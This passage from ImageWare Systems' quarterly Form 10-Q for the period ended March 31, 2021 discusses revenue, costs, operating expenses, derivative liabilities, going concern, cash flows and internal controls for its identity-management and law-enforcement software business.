ITEM 2.  MANAGEMENT’S DISCUSSION AND ANALYSIS OF FINANCIAL CONDITION AND RESULTS OF OPERATIONS

Forward-Looking Statements

This Quarterly Report on Form 10-Q (this "Quarterly Report") contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended (the "Securities Act"), and Section 21E of the Securities Exchange Act of 1934, as amended (the "Exchange Act"). All forward-looking statements included in this report are based on information available to us as of the date hereof and we assume no obligation to update any forward-looking statements. Forward-looking statements involve known or unknown risks, uncertainties and other factors, which may cause our actual results, performance or achievements, or industry results to be materially different from any future results, performance or achievements expressed or implied by such forward-looking statements. Factors that could cause or contribute to such differences include but are not limited to those items discussed under “Risk Factors” in the Company’s Annual Report on Form 10-K for the fiscal year ended December 31, 2020, and in Item 1A of Part II of this Quarterly Report on Form 10-Q (the “Quarterly Report”).

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

The preparation of the condensed consolidated financial statements in conformity with GAAP requires management to make estimates and assumptions that affect the reported amounts of assets and liabilities and disclosure of contingent assets and liabilities at the date of the condensed consolidated financial statements, and the reported amounts of revenue and expense during the reporting period. Significant estimates include the evaluation of our ability to continue as a going concern, the allowance for doubtful accounts receivable, assumptions used in the Black-Scholes model to calculate the fair value of share based payments, fair value of financial instruments issued with and affected by the Series D Preferred Financing, assumptions used in the application of revenue recognition policies, and assumptions used in the application of fair value methodologies to calculate the fair value of pension assets and obligations.

Critical accounting policies are those that, in management’s view, are most important in the portrayal of our financial condition and results of operations. Management believes there have been no material changes during the three months ended March 31, 2021 to the critical accounting policies discussed in the Management’s Discussion and Analysis of Financial Condition and Results of Operations section of our Annual Report on Form 10-K for the year ended December 31, 2020.

Results of Operations

This management’s discussion and analysis of financial condition and results of operations should be read in conjunction with the condensed consolidated financial statements and related notes contained elsewhere in this Quarterly Report.

Comparison of the Three Months Ended March 31, 2021 to the Three Months Ended March 31, 2020

	Three Months Ended March 31,
Net Product Revenue	2021	2020	$ Change	% Change
(dollars in thousands)

Software and royalties	$39	$125	$(86)	(69)%
Percentage of total net product revenue	70%	83%
Hardware and consumables	$13	$14	$(1)	(7)%
Percentage of total net product revenue	23%	9%
Services	$4	$11	$(7)	(64)%
Percentage of total net product revenue	7%	7%
Total net product revenue	$56	$150	$(94)	(63)%

Software and royalty revenue decreased approximately $86,000 during the three months ended March 31, 2021 as compared to the corresponding period in 2020. This decrease is attributable to lower identification project related revenue of approximately $53,000, lower identification royalties of approximately $30,000 and lower law enforcement software revenue of approximately $7,000 offset by higher sales of boxed identity management software sold through our distribution channel of approximately $4,000.

Revenue from the sale of hardware and consumables decreased approximately $1,000 during the three months ended March 31, 2021 as compared to the corresponding period in 2020 due to a decrease in consumables procurement by our law enforcement customers.

Services revenue is comprised primarily of software integration services, system installation services and customer training. Such revenue decreased approximately $7,000 during the three months ended March 31, 2021 as compared to the corresponding period of 2020 due to a decrease in the service element of project related work completed during the three months ended March 31, 2021.

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

During the three months ended March 31, 2021, we have focused on strategically updating our products with the latest mobile and cloud technology prioritized by market opportunities. We relaunched GoVerify ID® in July 2020. This relaunch includes a new container and microservices-based architecture along with refreshed mobile and desktop clients. We believe these updates will result in additional customers implementing our GoVerify ID® solution. Additionally, we have focused on the integration of the suite of products that comprise out Identity Platform. Throughout the remainder of 2021 we plan to continue to enhance our Identity Platform products, including our EPI (our biometric smart access cards) and law enforcement offerings by leveraging cloud and mobile technologies to improve both functionality and value to the customer. Management believes that these initiatives will result in the expansion of our solutions into both law enforcement and non-governmental sectors including commercial, consumer and healthcare applications further resulting in additional implementations of both our Authenticate products and Identity Platform products.

	Three Months Ended March 31,
Maintenance Revenue	2021	2020	$ Change	% Change
(dollars in thousands)

Total maintenance revenue	$677	$646	$31	5%

Maintenance revenue was approximately $677,000 for the three months ended March 31, 2021, as compared to approximately $646,000 for the corresponding period in 2020. Identity management maintenance revenue generated from identification software solutions was approximately $361,000 for the three months ended March 31, 2021 as compared to approximately $317,000 during the comparable period in 2020. Law enforcement maintenance revenue was approximately $316,000 and $329,000 for the three months ended March 31, 2021 and 2020, respectively. The decrease of $13,000 in law enforcement software maintenance revenue for the three months ended March 31, 2021 as compared to the corresponding period of 2020 is reflective of the expiration of certain maintenance contracts. The increase in our Identity Management maintenance revenue of approximately $44,000 reflects the expansion of our installed base.

We anticipate growth of our maintenance revenue through the retention of existing customers combined with the expansion of our installed base resulting from the completion of project-oriented work; however, we cannot predict the timing of this anticipated growth.

	Three Months Ended March 31,
Cost of Product Revenue:	2021	2020	$ Change	% Change
(dollars in thousands)

Software and royalties	$—	$14	$(14)	(100)%
Percentage of software and royalty product revenue	0%	11%
Hardware and consumables	$9	$6	$3	50%
Percentage of hardware and consumables product revenue	69%	43%
Services	$—	$1	$(1)	(100)%
Percentage of services product revenue	0%	9%
Total product cost of revenue	$9	$21	$(12)	(57)%
Percentage of total product revenue	16%	14%

The cost of software and royalty product revenue decreased approximately $14,000 due primarily to lower software and royalty revenue for the three months ended March 31, 2021 of approximately $86,000 combined with the 2021 revenue being comprised of solutions containing no third-party software costs. In addition to changes in costs of software and royalty product revenue caused by revenue level fluctuations, costs of products can vary as a percentage of product revenue from period to period depending upon level of software customization and third-party software license content included in product sales during a given period.

The cost of revenue for our hardware and consumables sales increased by approximately $3,000 for the three months ended March 31, 2021 as compared to the corresponding period in 2020 despite lower hardware and consumable revenue of $1,000 due to the 2021 period containing a larger mix of consumables with slightly higher costs of revenue than the corresponding period in 2020.

Maintenance cost of revenue	Three Months Ended March 31,
(dollars in thousands)	2021	2020	$ Change	% Change
Total maintenance cost of revenue	$110	$98	$12	12%
Percentage of total maintenance revenue	16%	15%

 Cost of maintenance revenue increased approximately $12,000 during the three months ended March 31, 2021 as compared to the corresponding period in 2020 due primarily to higher maintenance revenue of approximately $31,000. This increase is reflective of higher maintenance labor costs incurred during the three months ended March 31, 2021 as compared to the corresponding period in 2020 due primarily to the composition of engineering resources used in the provision of maintenance services.

	Three Months Ended March 31,
Product gross profit	2021	2020	$ Change	% Change
(dollars in thousands)
Software and royalties	$39	$111	$(72)	(65)%
Percentage of software and royalty product revenue	100%	89%
Hardware and consumables	$4	$8	$(4)	(50)%
Percentage of hardware and consumables product revenue	31%	57%
Services	$4	$10	$(6)	(60)%
Percentage of services product revenue	100%	91%
Total product gross profit	$47	$129	$(82)	(64)%
Percentage of total product revenue	84%	86%

Software and royalty gross profit decreased approximately $72,000 for the three months ended March 31, 2021 from the corresponding period in 2020 due primarily to lower software and royalty revenue of approximately $86,000 combined with lower software and royalty cost of revenue of $14,000 for the same period. In addition to changes in costs of software and royalty product revenue caused by revenue level fluctuations, costs of products can vary as a percentage of product revenue from period to period depending upon level of software customization and third-party software license content included in product sales during a given period.

Services gross profit decreased approximately $6,000 for the three months ended March 31, 2021 as compared to the corresponding period in 2020 due to lower service revenue of approximately $7,000 combined with lower service cost of revenue of $1,000 for the three months ended March 31, 2021 as compared to the corresponding period in 2020. Although changes in costs of services product revenue are sometimes caused by revenue level fluctuations, costs of services can also vary as a percentage of service revenue from period to period depending upon both the level and complexity of professional service resources utilized in the completion of the service element.

Maintenance gross profit	Three Months Ended March 31,
(dollars in thousands)	2021	2020	$ Change	% Change

Total maintenance gross profit	$567	$548	$19	3%
Percentage of total maintenance revenue	84%	85%

Gross profit related to maintenance revenue increased 3% or approximately $19,000 for the three months ended March 31, 2021 as compared to the corresponding period in 2020. This increase reflects higher maintenance revenue of approximately $31,000 combined with higher cost of maintenance revenue of approximately $12,000 due primarily to the composition of engineering resources used in the provision of maintenance services. Maintenance gross profit can change from period to period depending upon both the level and complexity of engineering service resources utilized in the provision of maintenance services.

	Three Months Ended March 31,
Operating expense	2021	2020	$ Change	% Change
(dollars in thousands)

General and administrative	$1,347	$983	$364	37%
Percentage of total net revenue	184%	123%
Sales and marketing	$724	$1,058	$(334)	(32)%
Percentage of total net revenue	99%	133%
Research and development	$1,168	$1,868	$(700)	(37)%
Percentage of total net revenue	159%	235%
Depreciation and amortization	$18	$18	$—	—%
Percentage of total net revenue	2%	2%

General and Administrative Expense

General and administrative expense is comprised primarily of salaries and other employee-related costs for executive, financial, and other infrastructure personnel. General legal, accounting and consulting services, insurance, occupancy and communication costs are also included with general and administrative expense. The dollar increase of approximately $364,000 during the three months ended March 31, 2021 as compared to the corresponding period in 2020 is comprised of the following major components:

●
Decrease in personnel related expense of approximately $38,000.

●
Increase in professional services of approximately $317,000, which includes higher legal fees of approximately $55,000 for various general corporate matters, higher patent related expense of approximately $39,000 resulting primarily from professional and legal fees related to the Company’s patent monetization efforts, higher audit fees of $14,000, higher contract services of approximately $66,000 and higher contractor fees of $141,000, higher Board of Director fees of $16,000 and higher general corporate expense of $3,000 offset by lower investor relations fees of approximately $17,000.

●
Increase in insurances, licenses, dues and other costs of approximately $87,000;

●
Increase in rent and office related costs of approximately $30,000; and

●
Decrease in stock-based compensation expense of approximately $32,000.

We continue to focus our efforts on achieving additional future operating efficiencies by reviewing and improving upon existing business processes and evaluating our cost structure. We believe these efforts will allow us to continue to gradually decrease our level of general and administrative expense expressed as a percentage of total revenue.

 Sales and Marketing

Sales and marketing expense consists primarily of the salaries, commissions, other incentive compensation, employee benefits and travel expense of our sales, marketing, and business development functions. The dollar decrease of approximately $334,000 during the three months ended March 31, 2021 as compared to the corresponding period in 2020 is primarily comprised of the following major components:

●
Decrease in personnel related expense of approximately $264,000, driven primarily by the effect of headcount decreases;

●
Decrease in contractor and contract services of approximately $21,000 resulting from decreased utilization of certain sales consultants of approximately $53,000, offset by higher contract service expense including dues and subscriptions of approximately $32,000;

●
Decrease in travel, trade show expense and office related expense of approximately $5,000;

●
Decrease in stock-based compensation expense of approximately $8,000; and

●
Decrease in our Mexico sales office expense and other of approximately $36,000 due to headcount reductions at this location.

Research and Development

Research and development expense consists primarily of salaries, employee benefits and outside contractors for new product development, product enhancements, custom integration work and related facility costs. Such expense decreased approximately $700,000 for the three months ended March 31, 2021 as compared to the corresponding period in 2020 due primarily to the following major components:

●
Decrease in personnel related expense of approximately $524,000 driven primarily by the effect of headcount decreases;

●
Decrease in contractor fees and contract services of approximately $113,000 resulting from the cancellation of certain engineering contractors;

●
Decrease in stock based-compensation expense of approximately $7,000; and

●
Decrease in office related expense, engineering tools, supplies and travel of approximately $56,000.

Depreciation and Amortization

During the three months ended March 31, 2021 and 2020, depreciation and amortization expense was approximately $18,000. The relatively small amount of depreciation and amortization reflects the relatively small property and equipment carrying value.

 Interest Expense (Income), Net

For the three months ended March 31, 2021, we recognized net interest expense of $0. For the three months ended March 31, 2020, we recognized interest expense of $25,000 and interest income of approximately $1,000. Interest expense for the three months ended March 31, 2020 reflects interest incurred on a related party factoring agreement.

Other (Income) Expense, Net

During the three months ended March 31, 2021, we recognized other expense of approximately $82,000 from the write-off of certain furniture and fixtures and recognized other income of approximately $57,000 from the settlement of certain liabilities at less than their carrying amount.

Change in Fair Value of Derivative Liabilities

For the three months ended March 31, 2021, we recognized income of approximately $1,172,000 from the decrease of derivative liabilities arising from the consummation of the Series D Financing in November 2020. Such decrease was determined by management using fair value methodologies and is included as income under the caption “Change in fair value of derivative liabilities” in our condensed consolidated statement of operations for three months ended March 31, 2021.

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

Loss on Extinguishment of Derivative Liabilities

During the three months ended March 31, 2021, we recognized a loss on the extinguishment of derivative liabilities of approximately $335,000 pursuant to the conversion of 354 shares of Series D Preferred into Common Stock. Such loss is included in the caption “Loss on extinguishment of derivative liabilities” in our condensed consolidated statement of operations for three months ended March 31, 2021.

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

 Going Concern and Management’s Plan

At March 31, 2021, we had negative working capital of approximately $20,887,000 as compared to negative working capital of approximately $19,349,000 at December 31, 2020. Included in our negative working capital as of March 31, 2021 are $22,850,000 of derivative liabilities which are not required to be settled in cash except in the event of the consummation of a Change of Control or at any time after the fourth anniversary of the Series D Preferred issuance, at which time the holders of the Series D Preferred may require the Company to redeem in cash any or all of the holder’s outstanding Series D Preferred at an amount equal to the Series D Liquidation Preference Amount. At March 31, 2021 the Liquidation Preference Amount totaled $22,757,000.

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

Operating Activities

We used net cash of $3,290,000 in operating activities for the three months ended March 31, 2021 as compared to net cash used of $1,980,000 during the comparable period in 2020. During the three months ended March 31, 2021, net cash used in operating activities consisted of net loss of $1,885,000 and an increase in working capital and other assets and liabilities of $767,000. Those amounts are in addition to approximately $638,000 of non-cash income, including $1,172,000 in income from the change in fair value of derivative liabilities offset by $78,000 in stock-based compensation, $18,000 in depreciation and amortization $82,000 in non-cash expense from the disposal of fixed assets, $21,000 from the issuance of common stock as compensation in lieu of cash and $335,000 from loss on extinguishment of derivative liabilities. During the three months ended March 31, 2021, we used cash of $459,000 from increases in current assets combined with $10,000 from decreases in our operating leases right-of-use assets and used cash of $298,000 through decreases in current liabilities and deferred revenue.

During the three months ended March 31, 2020, net cash used in operating activities consisted of net loss of $3,124,000 and a decrease in working capital and other assets and liabilities of $1,137,000. Those amounts were offset by approximately $7,000 of non-cash costs, including $186,000 in stock-based compensation, $18,000 in depreciation and amortization offset by $197,000 in the change in fair value of derivative liabilities. During the three months ended March 31, 2020, we generated cash of $134,000 from decreases in current assets offset by $3,000 from increases in our operating leases right-of-use assets and generated cash of $1,006,000 through increases in current liabilities and deferred revenue.

 Investing Activities

Net cash used in investing activities during the three months ended was $53,000 as compared to $0 for the corresponding period in 2020. For the three months ended March 31, 2021, we used cash of $53,000 to funds capital expenditures of computer hardware.

Financing Activities

There was no net cash used or provided by financing activities during the three months ended March 31, 2021 as compared to $972,000 in cash provided from financing activities during the corresponding period in 2020. During the three months ended March 31, 2020, we generated cash of approximately $622,000 from the sale of 4,000,000 shares of Common Stock for $0.16 per share, or $640,000 before recognition of approximately $18,000 in direct offering costs. We also generated cash of $350,000 from the issuance of a related party note payable.

Inflation

We do not believe that inflation has had a material impact on our historical operations or profitability.

Off-Balance Sheet Arrangements

At March 31, 2021, we did not have any relationships with unconsolidated entities or financial partnerships, such as entities often referred to as structured finance, special purpose or variable interest entities, which would have been established for the purpose of facilitating off-balance sheet arrangements or other contractually narrow or limited purposes. In addition, we did not engage in trading activities involving non-exchange traded contracts. As a result, we are not exposed to any financing, liquidity, market or credit risk that could arise if we had engaged in such relationships. We do not have relationships and transactions with persons or entities that derive benefits from their non-independent relationship with us or our related parties except as disclosed elsewhere in this Quarterly Report.

Recently Issued Accounting Standards

Please refer to the section “Recently Issued Accounting Standards” in Note 2 of our Notes to the unaudited Condensed Consolidated Financial Statements.

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

ITEM 4.  CONTROLS AND PROCEDURES

Evaluation of Disclosure Controls and Procedures

Under the supervision and with the participation of our management, including our principal executive officer and acting financial officer, we conducted an evaluation of the effectiveness of the design and operations of our disclosure controls and procedures, as defined in Rules 13a-15(e) and 15d-15(e) under the Securities Exchange Act of 1934, as amended, (the “Exchange Act”), as of March 31, 2021. Based on this evaluation, the Company’s Chief Executive Officer concluded that our disclosure controls and procedures are effective to ensure that information required to be disclosed in the reports submitted under the Exchange Act, is recorded, processed, summarized and reported within the time periods specified in SEC rules and forms, including to ensure that information required to be disclosed by the Company is accumulated and communicated to management, including the principal executive officer and principal financial officer, as appropriate to allow timely decisions regarding required disclosure.

Changes in Internal Controls Over Financial Reporting

The Company’s Chief Executive Officer and acting financial officer, has determined that there have been no changes in the Company’s internal control over financial reporting during the period covered by this report identified in connection with the evaluation described in the above paragraph that have materially affected, or are reasonably likely to materially affect, the Company’s internal control over financial reporting.

PART II. OTHER INFORMATION

ITEM 1.  LEGAL PROCEEDINGS

None.

ITEM 1A.  RISK FACTORS

Investing in our common stock involves a high degree of risk. You should carefully consider the risks in our Annual Report on Form 10-K for our fiscal year ended December 31, 2020, filed on April 5, 2021, in addition to the other information contained in this Report, before making an investment decision. Our business, financial condition or results of operations could be harmed by any of these risks. As a result, you could lose some or all of your investment in our Common Stock. These risks and uncertainties are not the only ones we face. Additional risks not currently known to us or other factors not perceived by us to present significant risks to our business at this time also may impair our business operations.

ITEM 2.  UNREGISTERED SALES OF EQUITY SECURITIES AND USE OF PROCEEDS

 None.

ITEM 3.  DEFAULTS UPON SENIOR SECURITIES

None.

ITEM 4.  MINE SAFETY DISCLOSURES

Not applicable.

ITEM 5.  OTHER INFORMATION

None.

ITEM 6 .  EXHIBITS

(a)	EXHIBITS

3.1	Certificate of Amendment to the Amended and Restated Certificate of Incorporation of ImageWare Systems, Inc., dated April 21, 2021 (Exhibit 3.1 to the Current Report on Form 8-K filed April 26, 2021).
31.1	Certification of the Principal Executive Officer pursuant to Rule 13a-14(a) and 15d-14(a)
31.2	Certification by the Acting Financial Officer pursuant to Rule 13a-14(a) and 15d-14(a)
32.1	Certification by the Principal Executive Officer pursuant to 18 U.S.C. 1350 as adopted pursuant to Section 906 of the Sarbanes-Oxley Act of 2002
101.INS	XBRL Instance Document
101.SCH	XBRL Taxonomy Extension Schema
101.CAL	XBRL Taxonomy Extension Calculation Linkbase
101.DEF	XBRL Taxonomy Extension Definition Linkbase
101.LAB	XBRL Taxonomy Extension Label Linkbase
101.PRE	XBRL Taxonomy Extension Presentation Linkbase

SIGNATURES

In accordance with the requirements of the Exchange Act, the registrant caused this report to be signed on its behalf by the undersigned, thereunto duly authorized.

Date: May 20, 2021	IMAGEWARE SYTEMS, INC

By: /s/ Kristin Taylor
Kristin Taylor Chief Executive Officer (Principal Executive Officer) and President

Date: May 20, 2021	By: /s/ Jeffrey Hotze
Acting Financial Officer